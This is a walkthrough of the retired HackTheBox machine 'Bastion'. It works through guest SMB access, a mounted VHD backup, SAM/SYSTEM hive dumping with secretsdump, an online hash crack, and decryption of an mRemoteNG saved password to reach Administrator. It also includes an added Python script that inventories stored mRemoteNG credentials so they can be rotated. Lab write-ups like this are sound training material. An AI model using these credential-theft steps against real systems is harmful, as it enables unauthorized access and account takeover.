HackTheBox - Bastion



OS       Difficulty  IP Address    Status
Windows  Easy        10.10.10.134  Retired

This box, created by L4mpje, is classified as an easy machine on HackTheBox. Enumerating the box, we find an SMB share used for backups. We mount it and find a virtual hard disk (.vhd) file, mount the .vhd, and copy out the SAM and SYSTEM registry hives; cracking the dumped hash gives us our initial foothold. Enumerating for privilege escalation, we find an out-of-place program, mRemoteNG, whose saved password can be decrypted with the mRemoteNG Decryption Tool, giving us the Administrator password.

Phase 1 - Enumeration

Nmap

As usual, we start phase one with nmap to see which ports are open.

PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -36m05s, deviation: 1h09m16s, median: 3m53s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-18T19:48:23+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-18T17:48:27
|_  start_date: 2021-07-17T01:17:54

From the nmap result, we find out that it's running Windows Server 2016.

SMB

We enumerate SMB with a non-existent username; the server falls back to a guest session, as the smbmap output shows.

smbmap -u DoesNotExist -H 10.10.10.134

[+] Guest session       IP: 10.10.10.134:445    Name: 10.10.10.134                                      
[!] Unable to remove test directory at \\10.10.10.134\Backups\GAUTGQWZEI, please remove manually
        Disk                        Permissions     Comment
        ----                        -----------     -------
        ADMIN$                      NO ACCESS       Remote Admin
        Backups                     READ, WRITE
        C$                          NO ACCESS       Default share
        IPC$                        READ ONLY       Remote IPC

It looks like there is a shared folder called ‘Backups’ with read and write access. Let’s mount it and see what’s in it.

Mounting SMB Share

# we will make a folder to mount the share drive in
mkdir /mnt/smb

# then we will mount the drive to the folder
mount -t cifs //10.10.10.134/Backups /mnt/smb

Going through the share drive, we find something interesting.

/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ ls -la
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

A virtual hard disk (.vhd) file, which looks to be a backup of the machine’s main drive.

Phase 2 - Exploitation

Guestmount

Let’s mount the .vhd file.

# we will create a folder to mount the vhd
mkdir /mnt/vhd

# then mount the vhd drive
sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd

Dumping SAM and SYSTEM files

Going through the .vhd backup, nothing else stood out, so we went to the directory where Windows keeps the SAM (Security Account Manager) and SYSTEM registry hives.

# SAM & SYSTEM location
cd /mnt/vhd/Windows/System32/config/

# copying the files to our local kali machine
cp SAM SYSTEM ~/Documents/htb/machines/bastion/

Dumping/Cracking Hashes

Using Impacket’s SecretsDump, we dump the local account password hashes from the two hives.

impacket-secretsdump -sam SAM -system SYSTEM local

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...

We then use hashes.org to crack the hashes online. Of the three dumped hashes, only the one for L4mpje cracks. Note that the Administrator and Guest entries both carry the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0, which is the hash of an empty password, so there is nothing to crack for those two accounts.

We log in over SSH with the cracked credentials and get the user.txt flag:

l4mpje:bureaulampje

Phase 3 - Privilege Escalation

Going through and enumerating the Windows machine, we find an out-of-place program:

cd C:\Program Files (x86)\mRemoteNG

A little Googling turns up an article on how mRemoteNG stores its saved passwords insecurely: the saved password is encrypted, but it can be decrypted with a tool on GitHub (mRemoteNG Decryption Tool).

According to the article, all we need is the saved, encrypted password string from mRemoteNG’s configuration file, ‘confCons.xml’, which we find in the user’s roaming AppData folder.

cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG

type confCons.xml

Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
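confCons.xml is where mRemoteNG keeps its connection tree, and every Connection node with a non-empty Password attribute is a credential that, per the article the writeup cites, anyone who can read the file can recover. As an added example (not from the writeup or the mRemoteNG project), the Python below inventories such entries so they can be rotated after an incident. The XML is a constructed sample: the attribute names (Name, Type, Username, Domain, Password, Hostname, Protocol, and the root's EncryptionEngine, BlockCipherMode, KdfIterations and FullFileEncryption) are assumed to match the real file, the Protected value and the second stored password are placeholders, and the first Password string is the one shown above. Decrypting the strings is left to the tool the writeup names.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like an mRemoteNG confCons.xml. Assumption: attribute
# names follow the real file; Protected and the Web01 password are placeholders.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
      Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
      Hostname="127.0.0.1" Protocol="RDP" />
  <Node Name="Jumpbox" Type="Connection" Username="svc_backup" Domain="CORP"
      Password="" Hostname="10.0.0.5" Protocol="SSH2" />
  <Node Name="Servers" Type="Container" Username="" Domain="" Password="">
    <Node Name="Web01" Type="Connection" Username="webadmin" Domain=""
        Password="Y29uc3RydWN0ZWQ=" Hostname="10.0.0.10" Protocol="RDP" />
  </Node>
</mrng:Connections>
"""


def saved_credentials(xml_text: str) -> list:
    """Return every Connection node that carries a stored password.

    root.iter('Node') walks nested containers too, so entries inside folders
    are not missed. The Node elements carry no namespace prefix in the file,
    while the root element does, hence the plain 'Node' tag here."""
    root = ET.fromstring(xml_text)
    found = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        if node.get("Password", ""):
            found.append({
                "name": node.get("Name"),
                "username": node.get("Username", ""),
                "domain": node.get("Domain", ""),
                "hostname": node.get("Hostname", ""),
                "protocol": node.get("Protocol", ""),
            })
    return found


def file_settings(xml_text: str) -> dict:
    """Summarise the root-level encryption settings of the file."""
    root = ET.fromstring(xml_text)
    return {
        "engine": root.get("EncryptionEngine"),
        "mode": root.get("BlockCipherMode"),
        "kdf_iterations": int(root.get("KdfIterations", "0")),
        "full_file_encryption": root.get("FullFileEncryption") == "true",
    }


if __name__ == "__main__":
    print("file settings:", file_settings(SAMPLE_CONFCONS))
    for entry in saved_credentials(SAMPLE_CONFCONS):
        who = f"{entry['domain']}\\{entry['username']}" if entry["domain"] else entry["username"]
        print(f"saved password: {entry['name']} -> {who}@{entry['hostname']} ({entry['protocol']})")
```

On a live host the call is saved_credentials(open(path, encoding="utf-8").read()) against the confCons.xml in the user's roaming AppData folder; every entry it prints is an account to rotate, because the stored string is only as protected as the master password the user chose, and the writeup shows what happens with the default.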

We have found the encrypted saved password string we were looking for, so we run the mRemoteNG-Decrypt tool from GitHub with the following command:

python3 mRemoteNG-Decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Password: thXLHM96BeKL0ER2

# successful SSH login
ssh administrator@10.10.10.134

administrator@10.10.10.134's password:

Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. 
administrator@BASTION C:\Users\Administrator>

Finally, we get the Administrator password and have escalated privileges.